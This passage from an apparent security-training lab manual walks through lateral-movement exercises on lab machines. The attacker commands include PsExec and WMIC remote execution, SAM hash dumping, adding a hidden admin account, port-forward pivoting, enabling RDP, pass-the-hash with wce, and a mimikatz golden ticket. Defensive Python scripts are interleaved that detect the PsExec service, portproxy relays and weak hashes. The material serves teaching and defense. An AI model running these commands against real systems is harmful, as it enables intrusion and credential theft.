This command will copy “Attack.exe” to the Victim machine for remote execution (“-c”) with
elevated privileges (“-h”).
9. The command returns error code 0, which means the process did not encounter any errors:

PSEXEC: REMOTE EXECUTION RETURN RESULT 0

10. Switch to the Victim machine to verify if the process was executed.
11. Open a normal command prompt, not an elevated one.
12. List the contents of the root drive:

dir c:\

13. A file called Attack.txt should be present. This file is generated by the Attack.exe process which
was remotely executed by the Attacker machine:

PSEXEC: ATTACK.TXT WAS DROPPED, ATTACK.EXE SUCCESSFULLY EXECUTED REMOTELY


14. Try to delete the Attack.txt file with the command:

del c:\Attack.txt

The command fails with "Access is denied". This is caused by the "-h" parameter, which created
the process, and therefore the file, with elevated permissions.
15. Open an elevated command prompt and try to delete the file again:

del c:\Attack.txt

This time, the file is successfully deleted.


16. Verify if the file was deleted by listing the contents of the root directory:

dir c:\

17. The output indicates that Attack.txt no longer exists:

PSEXEC: ATTACK.TXT SUCCESSFULLY DELETED

18. Close the elevated command prompt.


19. Switch to the Attacker machine.
20. Re-run the last command, this time specifying the System account (-s) rather than elevated
privileges (-h):

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -s -c Attack.exe

The command returns with an error code 0, which means the process did not encounter any
errors.
21. Switch to the Victim machine to verify if the process was executed.
22. Using the command prompt, list the content of the root folder:

dir c:\

The Attack.txt should be present again.


23. Display the content and view the details of the Attack.txt file using the command:

more C:\Attack.txt


24. The text "Successful Attack" is displayed along with the Process Owner \\NT
AUTHORITY\SYSTEM:

PSEXEC: PROCESS OWNER CHANGED TO SYSTEM

25. Switch to the Attacker machine.


26. On a command prompt, navigate to “c:\Tools\samdump2”:

cd \Tools\samdump2

27. Execute samdump2:

samdump2.exe -l

28. This dumps the hashes of all existing local accounts to the screen:

PSEXEC: LOCAL HASH DUMP WITH SAMDUMP2

29. Transfer a copy of the file libeay32.dll to the Victim machine:

net use \\192.168.100.121\admin$ /user:ACE202\Victim N0virus1


copy libeay32.dll \\192.168.100.121\admin$

PsExec is able to copy executable files to the target prior to remote execution. However, if there
is a dependency, as is the case with samdump2, PsExec will not transfer any other required file.
Therefore we need to copy this file before running the PsExec command.
30. Execute Samdump2.exe remotely using PsExec.exe:

C:\Tools\PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -s -c samdump2.exe -l


31. Once executed, the password hashes of all existing local accounts on the Victim machine will be
displayed on the screen:

PSEXEC: RECEIVE REMOTE HASH DUMPS

32. Switch to the Victim machine.


33. Open an elevated command prompt
34. Delete Attack.txt:

del c:\Attack.txt

35. Open Event Viewer by clicking on Start > Run > eventvwr.
36. On the left panel, expand Windows Logs > System.
37. Open one of the most recent events; it should indicate that the PSEXESVC service entered the
running state:

PSEXEC: EVENT VIEWER DISPLAYING INFORMATION ABOUT PSEXESVC SERVICE

38. Close the Event Properties window.


39. On the left panel, click on Security.


40. The latest audit logs will show that the Victim account was successfully logged in:

PSEXEC: EVENT VIEWER DISPLAYING INFORMATION ON USER LOG IN STATUS

41. Click on the Details tab of the entry showing a successful login.
42. Expand System and scroll to the very bottom.
This will show that the account was logged in from the IP address of the Attacker machine,
192.168.100.111.
43. Switch back to the Attacker machine.
44. Using command prompt, delete the existing connection to the Victim machine in preparation for
the next activity:

net use \\192.168.100.121\admin$ /delete
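The System and Security events inspected in steps 35 to 42 are what a detection rule keys on. The following Python script, an added example that is not part of the workshop material, correlates a PSEXESVC service event (7045 service installed, 7036 entered the running state) with the latest preceding network logon (4624, logon type 3) from a remote address on the same host; the records are constructed in the XML shape of wevtutil qe /f:xml, and the host name PC-Attacker and the five-minute window are assumptions.

```python
"""Correlate Windows event records that betray PsExec-style remote execution.

Added example for the PsExec exercise (steps 35 to 42); it is not part of
the original workshop material. The records below are constructed in the
XML shape of `wevtutil qe <log> /f:xml`; the host name PC-Attacker and the
five-minute correlation window are assumptions.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed records: a network logon (4624, LogonType 3) of ACE202\Victim
# from the Attacker address, then the Service Control Manager reporting
# PSEXESVC (7045 = service installed, 7036 = entered the running state).
EVENTS_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4624</EventID><TimeCreated SystemTime="2019-12-19T09:02:10.000Z"/>
 <Channel>Security</Channel><Computer>PC-Victim.ACE202.TrendMicro</Computer></System>
 <EventData><Data Name="TargetUserName">Victim</Data><Data Name="TargetDomainName">ACE202</Data>
 <Data Name="LogonType">3</Data><Data Name="IpAddress">192.168.100.111</Data>
 <Data Name="WorkstationName">PC-Attacker</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>7045</EventID><TimeCreated SystemTime="2019-12-19T09:02:11.000Z"/>
 <Channel>System</Channel><Computer>PC-Victim.ACE202.TrendMicro</Computer></System>
 <EventData><Data Name="ServiceName">PSEXESVC</Data>
 <Data Name="AccountName">LocalSystem</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>7036</EventID><TimeCreated SystemTime="2019-12-19T09:02:11.500Z"/>
 <Channel>System</Channel><Computer>PC-Victim.ACE202.TrendMicro</Computer></System>
 <EventData><Data Name="param1">PSEXESVC</Data><Data Name="param2">running</Data></EventData>
</Event>
</Events>"""


def parse_events(xml_text):
    """Return one dict per <Event>: channel, event_id, time, computer, data."""
    records = []
    for ev in ET.fromstring(xml_text).iter("{%s}Event" % NS["e"]):
        system = ev.find("e:System", NS)
        stamp = system.find("e:TimeCreated", NS).get("SystemTime")
        records.append({
            "channel": system.findtext("e:Channel", namespaces=NS),
            "event_id": int(system.findtext("e:EventID", namespaces=NS)),
            "time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S.%fZ"),
            "computer": system.findtext("e:Computer", namespaces=NS),
            "data": {d.get("Name"): d.text for d in ev.findall("e:EventData/e:Data", NS)},
        })
    return records


def detect_psexec(records, window=timedelta(minutes=5)):
    """Pair each PSEXESVC service event with the latest preceding remote
    network logon on the same host. Unpaired service events are still
    reported: PSEXESVC showing up at all deserves an analyst's attention."""
    logons = [r for r in records
              if r["channel"] == "Security" and r["event_id"] == 4624
              and r["data"].get("LogonType") == "3"
              and r["data"].get("IpAddress") not in (None, "-", "127.0.0.1", "::1")]
    findings = []
    for r in records:
        if r["channel"] != "System" or r["event_id"] not in (7045, 7036):
            continue
        service = r["data"].get("ServiceName") or r["data"].get("param1") or ""
        if service.upper() != "PSEXESVC":
            continue
        finding = {"computer": r["computer"], "event_id": r["event_id"],
                   "user": None, "source_ip": None, "source_host": None}
        earlier = [l for l in logons if l["computer"] == r["computer"]
                   and timedelta(0) <= r["time"] - l["time"] <= window]
        if earlier:
            logon = max(earlier, key=lambda l: l["time"])
            finding["user"] = "%s\\%s" % (logon["data"]["TargetDomainName"],
                                          logon["data"]["TargetUserName"])
            finding["source_ip"] = logon["data"]["IpAddress"]
            finding["source_host"] = logon["data"].get("WorkstationName")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect_psexec(parse_events(EVENTS_XML)):
        print("ALERT PSEXESVC on %(computer)s (event %(event_id)d): logon by %(user)s "
              "from %(source_ip)s (%(source_host)s)" % f)
```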


Exercise 12: Remote Execution with AT


In this exercise, we will run programs on a remote computer using built-in Windows tools.

Note: In more recent Operating Systems, the at command is marked as deprecated. As a
replacement, you could utilize the Windows command schtasks.exe, which provides a similar
feature set.

Refer to Appendix B.9 on page 117 for parameters of the at command as well as Appendix
B.10 on page 117 for schtasks parameters.

> Transfer a Malicious File to a Remote Computer


1. Access the Attacker machine.
2. On an elevated command prompt, navigate to “C:\Tools”:

cd \tools

3. Connect to the Victim’s admin share via SMB and transfer the Attack.exe file:

net use \\PC-Victim\admin$ /user:ACE202\Victim N0virus1


copy attack.exe \\PC-Victim\admin$

4. Using the Victim administrator account on the Victim machine, we copied the Attack.exe file
from the Attacker machine to the Windows folder of the Victim machine:

AT: COPY ATTACK.EXE

> Remotely Schedule a Task to Execute a Program


1. Still on the Attacker machine, use the elevated command prompt to check the current time:

net time \\PC-Victim

This is to confirm the current time of the virtual machine, as it might be in a different time
zone than your own.
2. Add a new job on the Victim machine a few minutes after the current time. In the example below,
“9:04” is used because the current time on the Victim machine is “9:02”:

at \\PC-Victim 09:04 C:\Windows\Attack.exe


3. The at command should return Added a new job with job ID = 1 if the execution was
successful:

AT: SUCCESSFULLY SCHEDULED TASK REMOTELY

4. Switch to the Victim machine.


5. On a command prompt, navigate to “C:\Windows\Tasks” and list its content:

cd \Windows\Tasks
dir

6. The At1.job created remotely should be on the list.

AT: CONFIRM CREATION OF AT1.JOB

7. Wait 3-4 minutes, depending on the time you have set. Once the time has elapsed,
view the contents of the root directory:

dir c:\

8. The Attack.txt file, a payload generated by the Attack.exe process, should appear in the
results:

AT: REMOTE TASK EXECUTED SUCCESSFULLY


9. View the content and the details of the Attack.txt file:

more c:\Attack.txt

The text file contains the message "Successful Attack" with the Process Owner \\NT
AUTHORITY\SYSTEM.
10. Open Control Panel and navigate to System and Security > Administrative Tools > Task
Scheduler.
11. On the left panel, select Task Scheduler Library.
12. Select At1 in the list of tasks, and open the tab “History”:

AT: SCHEDULED TASK HISTORY

The latest entry should log the successful execution of the At1 task.
13. Open an elevated command prompt and delete the Attack.exe from “C:\Windows”:

del C:\windows\attack.exe

14. Also delete the Attack.txt payload from C:\:

del c:\Attack.txt

15. Switch back to the Attacker machine.


16. Delete the existing SMB connection to the Victim machine in preparation for the next
activity:

net use \\PC-Victim\admin$ /delete


Exercise 13: Remote Execution with WMIC


In this exercise, we will be using the Windows Management Instrumentation Command-line (WMIC)
tool to remotely create processes under an elevated user account.

> Transfer a Malicious File to a Remote Computer


1. Access the Attacker machine.
2. Open an elevated command prompt and navigate to “C:\Tools”:

cd \tools

3. Map Victim’s C: drive via SMB as local drive R:

net use R: \\PC-Victim\C$ /user:ACE202\Victim N0virus1

4. Copy the Attack.exe file to the Victim machine's “C:\Windows” directory using the mapped
network drive R:

copy Attack.exe r:\Windows

Using the Victim’s administrator account on the Victim machine, we copied the attack.exe file
from the Attacker machine to the Windows folder of the Victim machine.

> Use WMIC to Execute Files Remotely


1. Still on the Attacker machine, execute Attack.exe remotely using WMIC from command line:

wmic /node:"PC-Victim" /user:ACE202\Victim /password:N0virus1 process call create "c:\Windows\Attack.exe"

If this is the first time you run WMIC, you will see a message indicating that WMIC is being
installed.

Note: Refer to Appendix B.11 on page 117 for further information on wmic.

2. Once finished, it will execute the command on the Victim machine and will display the
following message:

WMIC: EXECUTING ATTACK.EXE REMOTELY


3. Switch to the Victim machine.


4. Open a command prompt and verify if Attack.exe was successfully executed:

dir c:\

The Attack.txt file, which is a payload generated by Attack.exe, should appear in the file list.
5. View the content and the details of the Attack.txt file:

more c:\Attack.txt

The text “Successful Attack" is displayed along with the Process Owner.
6. Open Control Panel and navigate to System and Security > Administrative Tools > Event
Viewer.
7. On the left panel, expand Windows Logs and select Security.
8. Inspect the latest logon entries. One of them shows that the Victim account successfully
logged on from the IP address of the Attacker machine:

WMIC: DISPLAY EVENT VIEWER INFORMATION

9. Select View > Show Analytic and Debug Logs in the main menu.
10. On the left panel, expand Applications and Services Logs > Microsoft > Windows > WMI-Activity
and select Trace. The list is currently empty; no events have been logged.

Note: With the default settings of Windows Operating Systems, not all logging is enabled.
Therefore it is expected that the WMI-Activity Trace log is empty. This is very
important to consider, especially in investigation scenarios, as useful information might
not be readily available when needed.


> Configuring WMI-Activity Trace in Event Viewer


1. Using the elevated command prompt, enable WMI-Activity Trace:

wevtutil sl Microsoft-Windows-WMI-Activity/Trace /e:true

2. When prompted about enabling and clearing the log, press <y>:

WMIC: ENABLE WMI ACTIVITY TRACE AND CLEAR LOGS

3. To confirm the trace is now recording, switch to the Attacker machine.


4. Execute Attack.exe remotely again using WMIC:

wmic /node:"PC-Victim" /user:ACE202\Victim /password:N0virus1 process call create "c:\Windows\Attack.exe"

5. Switch back to the Victim machine.


6. Check the Event Viewer again by refreshing the current view of Applications and Services
Logs > Microsoft > Windows > WMI-Activity > Trace.
7. The list now displays the recent WMI activities:

WMI: WMI ACTIVITY TRACE RECORDED WMIC ACTIVITY

8. Open an elevated command prompt and delete Attack.exe as well as Attack.txt:

del c:\Windows\Attack.exe
del c:\Attack.txt

9. Switch back to the Attacker machine.


10. Delete the mapped drive and existing SMB connection to the Victim machine in preparation
for the next activity:

net use r: /delete


Exercise 14: Remote Port Forwarding and RDP


In this exercise, we will configure port forwarding on the Victim machine remotely to bypass FTP
restrictions on the Server machine. We will also use remote commands to enable RDP on a target
machine.

> Forward Traffic that Passes Through the FTP Port


1. Access the Attacker machine and open an elevated command prompt.
2. Navigate to “C:\Tools”:

cd \tools

3. Add a new user harry to the Victim machine using PsExec.exe:

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h net user harry Pass1234 /add

4. Add the new user harry to the Victim machine's administrators group:

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h net localgroup administrators harry /add

5. Check if you can FTP to the Server machine by using the command:

ftp 192.168.100.131

6. The results show that you are not allowed to use FTP on the remote host:

PORT FORWARDING: FTP DENIED ACCESS BASED ON SOURCE IP


7. Set up port forwarding remotely on the Victim machine:

PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh interface portproxy add v4tov4 listenaddress=192.168.100.121 listenport=2121 connectaddress=192.168.100.131 connectport=21

With the above command, we create a port forwarding rule on the Victim, which redirects
any incoming connection on port 2121 to port 21 of the Server machine.

Note: Refer to Appendix B.12 on page 118 for more information on the netsh command.

8. Add a firewall rule remotely to open up the FTP port 2121:

PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh advfirewall firewall add rule name="FTP_Forward" dir=in action=allow protocol=TCP localport=2121

9. Each of the PsExec.exe commands should return error code 0 when completed.
10. Use the following two commands to connect to port 2121:

ftp
open 192.168.100.121 2121

We have configured this port to forward traffic to port 21 of the Server machine.
The Attacker machine is now allowed to connect to the Server FTP, as the Server sees the
traffic coming from Victim, rather than the Attacker machine.
11. Provide the following credentials to the FTP:

Username: FtpUser
Password: FtpPass

12. We’re now logged on to the FTP Server:

PORT FORWARDING: SUCCESSFULLY LOGGED IN TO FTP SERVER

13. Exit the FTP command line:

quit


>Enable Remote Access to the Victim Machine


1. Still on the Attacker machine, open the Remote Desktop application via Start > Run >
mstsc.exe.
2. Specify the Victim’s IP, 192.168.100.121, as Computername and click “Connect”.
3. The Remote Desktop client will fail with the following message:

REMOTE RDP: CONNECTION FAILED

4. Close the error message and switch back to the elevated command prompt.
5. Still in the “C:\Tools” directory, enable RDP access remotely on Victim via the command:

PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /f /v fDenyTSConnections /t REG_DWORD /d 0

The above command uses PsExec to manipulate registry entries on the target machine,
specifically the “fDenyTSConnections” value, which is set to 0 to allow Remote Desktop connections.
6. Add a firewall exception for RDP:

PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389

7. Both commands complete successfully, returning the error code 0 message:

REMOTE RDP: MANIPULATING REGISTRY KEYS AND ADVFIREWALL SETTINGS WITH PSEXEC

8. Switch back to the RDP Client and try to connect again to the Victim machine on
192.168.100.121.
This time, a prompt will ask for login credentials. Specify the credentials for the Victim user.


9. When prompted about the identity of the remote computer and the validation of the
certificate, click on “Yes”:

REMOTE RDP: IDENTITY WARNING

Optionally, the Don't ask me again… check box can be enabled to prevent this notification in
the future.
This starts a Remote Desktop session to the Victim machine and proves that our remote
execution using PsExec was successful.
10. Close the RDP client.
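Both parts of this exercise leave auditable artifacts on the Victim: the portproxy rule from step 7 of the port-forwarding part and fDenyTSConnections=0 from step 5 of the RDP part. The Python script below, added here and not part of the workshop material, parses the output of netsh interface portproxy show v4tov4 and of reg query for that value and reports off-host relays and unexpected RDP enablement; the command outputs are constructed to match the lab addresses.

```python
r"""Audit a Windows host for the pivot artifacts this exercise leaves behind:
netsh portproxy relays and an enabled Remote Desktop listener.

Added example, not part of the original workshop material. The command
outputs below are constructed to match the lab (Victim 192.168.100.121
relaying to Server 192.168.100.131); a defender collects the real ones with
`netsh interface portproxy show v4tov4` and
`reg query "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections`.
"""
import ipaddress
import re

# Constructed output of `netsh interface portproxy show v4tov4`: the lab's
# relay rule plus a harmless loopback-only rule for contrast.
PORTPROXY_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.100.121 2121        192.168.100.131 21
127.0.0.1       8080        127.0.0.1       80
"""

# Constructed output of `reg query ... /v fDenyTSConnections` after the
# value was set to 0 (Remote Desktop connections allowed).
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

PROXY_RE = re.compile(r"^\s*(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})\s*$")
DWORD_RE = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_portproxy(text):
    """Return the v4tov4 rules as dicts; header and separator lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = PROXY_RE.match(line)
        if m:
            rules.append({"listen": m.group(1), "listen_port": int(m.group(2)),
                          "connect": m.group(3), "connect_port": int(m.group(4))})
    return rules


def parse_reg_dwords(text):
    """Return {value name: int} for every REG_DWORD line of `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = DWORD_RE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def is_relay(rule):
    """True when the rule forwards traffic off the host (connect side not loopback)."""
    try:
        return not ipaddress.ip_address(rule["connect"]).is_loopback
    except ValueError:  # a host name rather than an address: assume off-host
        return True


def audit(portproxy_text, reg_text, rdp_expected=False):
    """Return findings: every off-host relay, plus RDP enabled where not expected."""
    findings = []
    for rule in parse_portproxy(portproxy_text):
        if is_relay(rule):
            findings.append("portproxy relay %s:%d -> %s:%d" % (
                rule["listen"], rule["listen_port"], rule["connect"], rule["connect_port"]))
    if parse_reg_dwords(reg_text).get("fDenyTSConnections") == 0 and not rdp_expected:
        findings.append("Remote Desktop enabled (fDenyTSConnections=0) where not expected")
    return findings


if __name__ == "__main__":
    for finding in audit(PORTPROXY_OUTPUT, REG_QUERY_OUTPUT):
        print("ALERT:", finding)
```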


Exercise 15: Pass-The-Hash


In this exercise, we will be using the Windows Credentials Editor (wce) to replace a logon session's
NTLM hash. This tricks the machine into thinking that the current user is authenticated as another
user.

Note: The use of wce is limited to a certain set of Operating Systems. When used in environments
with newer versions of Windows, such as Windows 10 and Windows 2012, wce might not work
as expected. Alternative tools, such as the mimikatz framework, can be used instead.

Refer to Appendix B.13 on page 118 for information about wce parameters.

1. Access the Server machine.


2. Map the Attacker machine's C: drive as network drive X:

net use X: \\192.168.100.111\c$

3. Dump the password hashes of the Server machine to a hashes.txt file:

x:
cd \tools
gsecdump-v2b5.exe -s > hashes.txt

Remember: gsecdump only works on operating systems up to Windows XP and 2003.


With the above command, we saved the hash dump onto the X: drive, which is located on the
Attacker machine.
4. Remove the mapped network drive X:

c:
net use x: /delete

5. Switch to the Attacker machine.


6. Open an elevated command prompt and navigate to “C:\Tools”:

cd \tools

7. Run the following command to open hashes.txt using Notepad:

notepad hashes.txt

8. The information in the text file is stored in the following format:

Account Name:Account ID:LM Hash:NTLM Hash:::


9. Highlight the LM and NTLM hash only for the account ACE202\Victim and copy it to the
clipboard:

PASS-THE-HASH: COPY LM & NTLM HASH

10. Switch back to the elevated command prompt.


11. Use the following commands to check the current logon credentials:

cd wce_v1_41beta_universal
wce -w

12. This command will display the username and the cleartext password of the account that is
currently logged on:

PASS-THE-HASH: WCE -W DISPLAYS ACCOUNT DETAILS IN CLEARTEXT

13. Attempt to access the content of the C: drive of the Victim machine remotely without specifying
a user account:

dir \\192.168.100.121\C$

As there was no user specified, this command uses the credentials of the user currently logged
in. As that user has no permissions on the Victim machine, the “dir” command will fail.
14. Use wce to change the NTLM credentials of the current command prompt window:

wce -s Victim:ACE202:[LM Hash]:[NTLM Hash]

Make sure to replace “[LM Hash]:[NTLM Hash]” with the contents of your “hashes.txt”, taken in step
9.
The above command changes the NTLM credentials, but only for the command prompt in which
wce was started.


15. Once executed, wce will return the message NTLM credentials successfully changed:

PASS-THE-HASH: WCE -S SUCCESSFULLY CHANGED NTLM CREDENTIALS

16. Verify that the new NTLM credentials allow querying the contents of the Victim machine's C:
drive remotely:

dir \\192.168.100.121\C$

17. By replacing the NTLM credentials of the current logon session, the dir command is now
successful:

PASS-THE-HASH: ACCESS GRANTED BY REPLACING NTLM CREDENTIALS

18. Execute the Attack.exe file remotely on Victim using PsExec.exe, this time without specifying a
user or password:

cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe

19. Verify if the process was executed properly by looking for the generated Attack.txt file
remotely:

dir \\192.168.100.121\C$

20. List the contents of the Attack.txt via:

more \\192.168.100.121\C$\Attack.txt


21. The results will show that the process was executed by the ACE202\Victim account. This proves
that the Pass-The-Hash technique was successfully utilized:

PASS-THE-HASH: PROCESS OWNER PROVES PASS-THE-HASH WAS SUCCESSFUL

22. List the logon sessions and NTLM credentials locally using wce:

cd wce_v1_41beta_universal
wce -l

23. This will list all logon sessions, which now also includes the Victim account:

PASS-THE-HASH: LOCAL LOGON SESSIONS AND NTLM CREDENTIALS

24. Switch to the Victim machine.


25. Remove the Attack.txt file via an elevated command prompt:

del c:\Attack.txt

26. Switch to the Server machine.


27. Click on Start > Programs > Administrative Tools > Remote Desktops.
28. On the left panel, right-click Remote Desktops and select “Add New Connection...”

PASS-THE-HASH: REMOTE DESKTOP MANAGER


29. Enter the IP address of the Attacker machine, 192.168.100.111, on both the Server name and
Connection name fields.
Enter the logon information of the Administrator and click “OK”:

PASS-THE-HASH: SET UP REMOTE CONNECTION

30. Double-click on the newly created Remote Desktop connection on the left panel.
31. Using the Administrator account to connect to the Attacker machine creates a logon session on
the target. Do not click “Yes”.

PASS-THE-HASH: INITIATING RDP CONNECTION

32. Leave the Remote Desktop connection window open and switch to the Attacker machine.
33. On the command prompt, list the logon sessions and NTLM credentials again using wce:

wce -l

34. This will now list the Administrator account as well:

PASS-THE-HASH: ADMINISTRATOR SESSION LISTED


35. Copy the hashes of the Administrator account to the clipboard.


36. Using wce, switch the current NTLM credentials to Administrator:

wce -s Administrator:ACE202:[LM HASH]:[NTLM HASH]

37. Execute the Attack.exe file remotely on the Victim machine using PsExec.exe:

cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe

38. Verify if the process was executed properly by displaying the contents of Attack.txt:

more \\192.168.100.121\C$\Attack.txt

The results show that the process was executed by the Administrator account.
39. Reboot the Attacker machine in preparation for the next exercise.
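The Account Name:Account ID:LM Hash:NTLM Hash::: format from step 8 (the same layout as the powerdump output in the privilege escalation exercise) is what a defender should audit before an attacker gets to replay it. The Python script below, an added example rather than workshop code, parses that format and flags stored LM hashes, empty passwords and NT hashes shared across accounts; the hash values in the sample are constructed, and only the two empty-string constants are real.

```python
"""Audit a pwdump-style hash dump for conditions that make pass-the-hash easy.

Added example for the hashes.txt format (step 8) and the identical powerdump
layout; not part of the original workshop material. The sample lines are
constructed with made-up hash values; only the two well-known constants for
an empty LM hash and an empty NT hash are real.
"""
from collections import defaultdict

# Well-known hashes of the empty string (public constants, not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed dump in the format Account Name:Account ID:LM Hash:NTLM Hash:::
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Victim:1001:1122334455667788aabbccddeeff0011:0123456789abcdef0123456789abcdef:::
FtpUser:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""


def parse_pwdump(text):
    """Return one dict per non-blank line; raise ValueError on a malformed line."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("line %d: expected at least 4 colon-separated fields" % lineno)
        name, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError("line %d: hash fields must be 32 hex characters" % lineno)
        records.append({"name": name, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def audit_hashes(records):
    """Return findings a defender acts on before these hashes are replayed.

    - LM hash present: NoLMHash policy not enforced, LM is trivially cracked.
    - Empty NT hash: account has no password (expected only for disabled
      built-ins such as Guest; still worth confirming).
    - Same NT hash on several accounts: one stolen hash unlocks all of them.
    """
    findings = []
    by_nt = defaultdict(list)
    for r in records:
        if r["lm"] != EMPTY_LM:
            findings.append("%s: LM hash stored (NoLMHash not enforced)" % r["name"])
        if r["nt"] == EMPTY_NT:
            findings.append("%s: empty password" % r["name"])
        by_nt[r["nt"]].append(r["name"])
    for nt, names in by_nt.items():
        if len(names) > 1 and nt != EMPTY_NT:
            findings.append("shared password between %s" % ", ".join(sorted(names)))
    return findings


if __name__ == "__main__":
    for finding in audit_hashes(parse_pwdump(SAMPLE_DUMP)):
        print("FINDING:", finding)
```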


Exercise 16: Kerberos Golden Ticket Attack


Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having
access to an account's password. Kerberos authentication can be used as the first step for lateral
movement into a remote system.

Golden Tickets for the domain can be obtained using the NTLM hash of the Key Distribution Service
account, KRBTGT. This account allows generation of TGTs for any account in Active Directory.
1. Access the Attacker machine.
2. Open a command prompt and run the following command:

pushd \\Server\C$

The pushd command accepts either a network path or a local drive letter and path. If a network
path is specified, pushd will create a temporary drive pointing to the specified network resource
and will change into the temporary drive.
3. The pushd command fails, as we currently have no access rights:

KERBEROS GOLDEN TICKET ATTACK: PUSHD COMMAND

4. We will need the domain SID. The SID of any domain account, KRBTGT included, is the domain SID followed by the account's RID, so we query the KRBTGT account and strip the RID later. Run the following commands:

wmic useraccount where name='krbtgt' get SID > SID.txt


notepad SID.txt

5. This opens Notepad, displaying the security identifier (SID) of the KRBTGT service account:

KERBEROS GOLDEN TICKET ATTACK: SID OF KRBTGT SERVICE ACCOUNT

Highlight the SID as shown in the screenshot. Do not close Notepad, as we require the SID during
the exercise.
6. In the command prompt, navigate to “C:\Tools”:

cd \tools

7. Open the hashes.txt file using Notepad:

notepad hashes.txt

Highlight the NTLM hash of user krbtgt(current-disabled). Leave the Notepad open, as we
require the contents for the next steps.
8. Back in the command prompt, navigate to the “Mimikatz” folder and start mimikatz.exe:

cd mimikatz\x64
mimikatz.exe


9. Once Mimikatz is started, the following screen will be shown:

KERBEROS GOLDEN TICKET ATTACK: MIMIKATZ

Note: Refer to Appendix B.14 on page 121 for a list of command examples in mimikatz.

10. Golden tickets can be created for existing domain accounts or for accounts that do not exist. Paste the information gathered earlier into a single command:

kerberos::golden /domain:ACE202.TrendMicro /rc4:fd7d8x751079c282116fbe7aac274079 /sid:S-1-5-21-1008503936-3139382480-897551679 /user:krbtgthacker /id:500 /ptt

/domain is the FQDN of the domain the ticket is issued for.
/rc4 is the NTLM hash of KRBTGT, which is the RC4-HMAC key the KDC uses to encrypt TGTs; use the value highlighted in step 7.
/sid is the domain SID: the KRBTGT SID from step 5 without its trailing RID, i.e. without the last four characters (“-502”). Every SID in the ticket's PAC is built from it, so it has to be exact. (The separate /sids option adds extra SIDs to SIDHistory for cross-domain access; it is not used here.)
/user is the name of the account the ticket is created for. It can be an existing account name, but it does not have to be.
/id is the RID of the account being impersonated; 500 is the built-in Administrator. Unless /groups is given, mimikatz also adds the default group RIDs 512 (Domain Admins), 513, 518, 519 and 520 to the ticket.
/ptt injects the created ticket into the current logon session.

Note: Make sure the rc4 and sid values match what you found in Notepad in steps 7 and 5. The hash printed above contains a non-hexadecimal character and will not work as shown; replace it with the 32-character hexadecimal value from hashes.txt.

11. Once executed, Mimikatz will show the following screen, indicating that the Golden ticket has
been successfully submitted:

KERBEROS GOLDEN TICKET ATTACK: MIMIKATZ SUBMITTED GOLDEN TICKET


12. The generated golden ticket can now be used. Launch a command prompt using the following
command:

misc::cmd

13. On the command prompt, type:

whoami

The result is ACE202\attacker: the injected ticket does not change the local logon session, it only changes what the Kerberos client presents to remote services.


14. Try to access Server's C: drive using:

pushd \\Server\c$

15. This time, we have the permissions to access the drive:

KERBEROS GOLDEN TICKET ATTACK: PUSHD COMMAND SUCCESSFUL

Notice we automatically switched into drive Y:. This is done via the pushd command, which
created the connection and mapped it temporarily to a new drive letter.
16. Navigate into the Active Directory database directory (NTDS):

cd windows\ntds
dir

You will be able to list the contents of this system folder.


17. Remotely execute a command prompt on the Server machine:

C:\Tools\PsTools\PsExec.exe \\Server cmd.exe

18. This will return the command prompt from Server onto the Attacker machine. Type in the
following commands to check for their values:

hostname
whoami
ipconfig


19. As a result, you should be presented with the following information:

KERBEROS GOLDEN TICKET ATTACK: SUCCESSFULLY INFILTRATED THE SERVER

Hostname is Server, as the command prompt runs on the Server machine; this is also why ipconfig returns 192.168.100.131.
More important is the output of whoami: the current user is the fake user created in step 10, krbtgthacker.
